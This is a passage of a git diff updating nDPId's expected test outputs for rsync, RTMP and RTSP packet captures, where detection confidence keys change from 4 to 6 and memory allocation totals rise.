00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387144174826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA0ACFAAEAGPKF\/AAABfwAAAdTZA2mzXXC2URoXF4AQACv+KAAAAQEICgA8cJUAPHCV"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":497,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387144174967} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872361 bytes -~~ total memory freed........: 5872361 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6005995 bytes +~~ total memory freed........: 6005995 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 681 chars diff --git a/test/results/rtmp.pcap.out b/test/results/rtmp.pcap.out index 9ae0f9c7d..7942c9048 100644 --- a/test/results/rtmp.pcap.out +++ b/test/results/rtmp.pcap.out @@ -4,8 +4,8 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1196541506793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506793,"pkt":"AAwpfMZqAFBWwAAICABFAAAwAzJAAIAGH8TAqCsBwKgrgASZB49J0s7PAAAAAHAC\/\/+GgwAAAgQFtAEBBAI="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1196541506794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506794,"pkt":"AFBWwAAIAAwpfMZqCABFAAAwAABAAEAGYvbAqCuAwKgrAQePBJklcSWUSdLO0HASFtAknQAAAgQFtAEBBAI="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1196541506794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1196541506794,"pkt":"AAwpfMZqAFBWwAAICABFAAAoAzNAAIAGH8vAqCsBwKgrgASZB49J0s7QJXEllVAQ\/\/9oMQAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":6948,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1196541507836} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 26/26 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872245 bytes -~~ total memory freed........: 5872245 bytes -~~ total allocations/frees...: 118141/118141 +~~ total memory allocated....: 6005879 bytes +~~ total memory freed........: 6005879 bytes +~~ total allocations/frees...: 120903/120903 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 684 chars diff --git a/test/results/rtsp.pcap.out b/test/results/rtsp.pcap.out index 442664d37..b4def8420 100644 --- a/test/results/rtsp.pcap.out +++ b/test/results/rtsp.pcap.out @@ -2,46 +2,46 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1627567277506} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 